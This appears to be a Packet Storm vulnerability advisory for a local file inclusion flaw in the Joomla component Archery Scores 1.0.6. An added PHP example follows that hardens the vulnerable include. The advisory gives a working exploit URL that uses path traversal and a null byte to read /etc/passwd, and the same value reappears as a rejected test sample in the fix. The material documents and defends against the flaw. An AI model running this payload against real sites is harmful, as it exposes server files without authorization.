Joomla Archery Scores 1.0.6 Local File Inclusion

2010-04-19T00:00:00
ID PACKETSTORM:88635
Type packetstorm
Reporter wishnusakti
Modified 2010-04-19T00:00:00

Description

                                        
================================================================================================  
  
Title : Joomla Component Archery Scores (com_archeryscores) v1.0.6 LFI Vulnerability  
Vendor : http://lispeltuut.org/  
Download : http://lispeltuut.org/archery-scores/download  
  
Date : Sunday, 18 April 2010 - GMT +07:00 Jakarta, Indonesia  
Author : wishnusakti + inc0mp13te (HH)  
Contact : evileyes60117[at]yahoo.com  
  
================================================================================================  
  
[+] Vulnerable  
  
./components/com_archeryscores/archeryscores.php  
  
Line 22: if($controller = JRequest::getVar('controller')) {  
Line 23: require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');  
Line 24: }  
  
[+] Exploit  
  
http://[site]/[path]/index.php?option=com_archeryscores&controller=[LFI]  
  
[+] PoC  
  
http://localhost/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00  
  
================================================================================================  
  
Greetz to:  
  
Residents of the #nob0dy priv8 Server  
(ander, NoGe, zxvf, kaka11, s4va, meylira, Jack, aJe, Unyil, madonk, & Bot² Scan :D)  
and all the hacking communities of the homeland  
Peace Yo :)  
  
================================================================================================  
  
# ./wishnusakti  
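A hardened form of the `require_once` at lines 22-24 of archeryscores.php, as an added example that is not part of the advisory or the component's code. The function name `resolve_controller_file()`, the temporary directory and the `scores.php` controller are assumptions made for the demo.

```php
<?php
// Added example, not the component's code. $controllersDir stands in for
// JPATH_COMPONENT . DS . 'controllers'; resolve_controller_file() is hypothetical.
function resolve_controller_file($controllersDir, $name)
{
    // 1. Allow-list: a controller name is a short identifier and nothing else.
    //    Rejects '/', '\', '.', NUL bytes (decoded %00) and empty values.
    if (!is_string($name) || !preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $name)) {
        return null;
    }

    // 2. Canonicalise both paths; realpath() returns false for missing files.
    $base = realpath($controllersDir);
    $file = realpath($controllersDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $file === false) {
        return null;
    }

    // 3. Containment: the resolved file must sit directly in the controllers
    //    directory, which also catches symlinks that point elsewhere.
    return dirname($file) === $base ? $file : null;
}

// Constructed demo: a temporary controllers directory holding one controller.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'archery_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'scores.php', "<?php\n");

$samples = array(
    'scores',                               // legitimate controller
    'missing',                              // well-formed name, no such file
    str_repeat('../', 9) . "etc/passwd\0",  // PoC value from the advisory, URL-decoded
    'scores.php',                           // extension supplied by the client
    '',                                     // empty parameter
);
foreach ($samples as $candidate) {
    $resolved = resolve_controller_file($dir, $candidate);
    $shown = json_encode($candidate, JSON_UNESCAPED_SLASHES);
    printf("%-50s => %s\n", $shown, $resolved === null ? 'rejected' : 'load ' . basename($resolved));
}

unlink($dir . DIRECTORY_SEPARATOR . 'scores.php');
rmdir($dir);
```

In the component, only a non-null return value would be passed to `require_once`. Joomla 1.5's `JRequest::getCmd()` and `JRequest::getWord()` apply a comparable character filter at the request layer, unlike the unfiltered `JRequest::getVar()` call shown in the advisory.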